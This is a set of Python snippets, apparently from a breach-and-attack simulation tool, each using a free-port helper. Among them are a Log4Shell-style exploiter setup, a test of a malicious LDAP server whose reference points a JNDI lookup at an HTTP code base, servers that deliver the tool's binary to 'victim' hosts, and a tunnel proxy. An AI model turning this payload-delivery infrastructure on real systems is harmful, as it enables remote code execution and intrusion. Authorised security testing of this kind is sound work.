def __init__(self, host: VictimHost): super().__init__(host) self._ldap_port = get_free_tcp_port() self._class_http_server_ip = get_interface_to_target(self.host.ip_addr) self._class_http_server_port = get_free_tcp_port() self._ldap_server = None self._exploit_class_http_server = None self._agent_http_server_thread = None self._open_ports = [ int(port[0]) for port in WebRCE.get_open_service_ports( self.host, self.HTTP, ["http"]) ]
def create_locked_transfer(host, src_path, local_ip=None, local_port=None): """ Create http server for file transfer with a lock :param host: Variable with target's information :param src_path: Monkey's path on current system :param local_ip: IP where to host server :param local_port: Port at which to host monkey's download :return: Server address in http://%s:%s/%s format and LockedHTTPServer handler """ # To avoid race conditions we pass a locked lock to http servers thread lock = Lock() lock.acquire() if not local_port: local_port = get_free_tcp_port() if not local_ip: local_ip = get_interface_to_target(host.ip_addr) if not firewall.listen_allowed(): LOG.error( "Firewall is not allowed to listen for incomming ports. Aborting" ) return None, None httpd = LockedHTTPServer(local_ip, local_port, src_path, lock) httpd.start() lock.acquire() return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote( os.path.basename(src_path))), httpd
def test_ldap_server(tmp_path): http_ip = "172.10.20.30" http_port = 9999 ldap_port = get_free_tcp_port() ldap_server = LDAPExploitServer(ldap_port, http_ip, http_port, tmp_path) ldap_server.run() server = Server(host="127.0.0.1", port=ldap_port) conn = Connection(server, auto_bind=True) conn.search( search_base=EXPLOIT_RDN, search_filter="(objectClass=*)", search_scope=BASE, attributes=ALL_ATTRIBUTES, ) assert len(conn.response) == 1 attributes = conn.response[0]["attributes"] assert attributes.get("objectClass", None) == ["javaNamingReference"] assert attributes.get("javaClassName", None) == ["Exploit"] assert attributes.get("javaCodeBase", None) == [f"http://{http_ip}:{http_port}/"] assert attributes.get("javaFactory", None) == ["Exploit"] ldap_server.stop()
def run(self): self._broad_sock = _set_multicast_socket(self._timeout) self.l_ips = local_ips() self.local_port = get_free_tcp_port() if not self.local_port: return if not firewall.listen_allowed(localport=self.local_port): LOG.info("Machine firewalled, listen not allowed, not running tunnel.") return proxy = self._proxy_class(local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port) LOG.info("Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s", proxy.__class__.__name__, self.local_port, self._target_addr, self._target_port) proxy.start() while not self._stopped: try: search, address = self._broad_sock.recvfrom(BUFFER_READ) if '?' == search: ip_match = get_close_matches(address[0], self.l_ips) or self.l_ips if ip_match: answer = '%s:%d' % (ip_match[0], self.local_port) LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer) self._broad_sock.sendto(answer, (address[0], MCAST_PORT)) elif '+' == search: if not address[0] in self._clients: LOG.debug("Tunnel control: Added %s to watchlist", address[0]) self._clients.append(address[0]) elif '-' == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] except socket.timeout: continue LOG.info("Stopping tunnel, waiting for clients: %s" % repr(self._clients)) # wait till all of the tunnel clients has been disconnected, or no one used the tunnel in QUIT_TIMEOUT seconds while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT): try: search, address = self._broad_sock.recvfrom(BUFFER_READ) if '-' == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] except socket.timeout: continue LOG.info("Closing tunnel") self._broad_sock.close() proxy.stop() proxy.join()
def _start_http_server(self): """ Starts custom http server that waits for GET requests :return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock) """ lock = threading.Lock() local_port = get_free_tcp_port() local_ip = get_interface_to_target(self.host.ip_addr) httpd = self.IndicationHTTPServer(local_ip, local_port, lock) lock.acquire() httpd.start() lock.acquire() return httpd, lock
def create_transfer(host, src_path, local_ip=None, local_port=None): if not local_port: local_port = get_free_tcp_port() if not local_ip: local_ip = get_interface_to_target(host.ip_addr) if not firewall.listen_allowed(): return None, None httpd = HTTPServer(local_ip, local_port, src_path) httpd.daemon = True httpd.start() return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote( os.path.basename(src_path))), httpd
def port(): return get_free_tcp_port()